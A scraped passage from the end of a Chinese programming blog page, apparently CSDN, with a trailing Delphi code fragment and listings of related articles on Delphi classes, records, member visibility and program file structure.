ProcessId);//只需这样调用即可 end; end; end; end; end.
Delphi VCL类结构
weixin_30642561的博客
08-25 186
转载于:https://www.cnblogs.com/fanweisheng/p/11409894.html
理解 Delphi 的类(一) - 从结构谈起
最新发布
男神的专栏
05-16 361
类只是一个模型, 需要根据模型(也就是类)创建(Create)出对象来才能使用, 用完后需要手动释放内存;结构与对象(类的实例)在内存中以不同的方式存放, 对象只是一个指针;(内存使用的规律应该是: 自动建立自动释放、手动建立手动释放)虽然这个类没有什么实际意义, 但就是一个类了}{需要先手动建立, 因为类需要实例化为对象才可以使用}结构(或叫记录)与类都是一种自定义类型;MyRec 结构的大小是 8}结构直接使用, 内存是自动管理的;{声明一个类变量, 也就是对象}{声明一个结构变量}
理解 Delphi 的类(一) - 从结构/记录谈起
兴趣使然的编程菜鸟
10-20 440
类的概念类是一种用户自定义的数据类型,可以说它是对某一类事物的抽象描述。类使用属性和方法来描述某一事务的具体特性和行为。简单举个例子:将轮船作为类进行描述,轮船不单单指一个物体,而是一类的总称。所以可以不考虑大小,颜色……而是将它抽象为一个类,对应的大小,颜色就可以在类中以属性的形式体现,而轮船在水中运动就是它的方法,所以。
Delphi 基础知识:类和对象
sensor_WU 博客
03-19 1860
具有严格保护可见性的类成员在它们被声明的类中是可见的,在任何子类中也是可见的,不管它在哪里被声明。一个类的实例不能访问同一个类的其他实例中的严格私有或严格保护的实例成员。一个被保护的成员在其类被声明的模块中的任何地方都是可见的,也可以从任何子类中看到,不管子类出现在哪个模块。受保护的方法可以被调用,受保护的字段或属性可以被读写,可以从属于声明受保护成员的类的任何方法的定义中调用。在类声明的开头没有指定可见性的成员默认为公开的,只要该类是在{$M+}状态下编译的,或者是从{$M+}状态下编译的类派生的;
Delphi 代码文件你结构
qq_25235869的博客
11-14 1148
代码文件结构: program的组织结构: // program Project1; //一个名为Project的项目文件 // uses              //在program中需要用到哪些单元 Froms, Unit1 in 'Unit1.pas', Dialogs; //定义常量和变量 var {$R *.res}//编译指令 此处是要编译的资源文件project1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值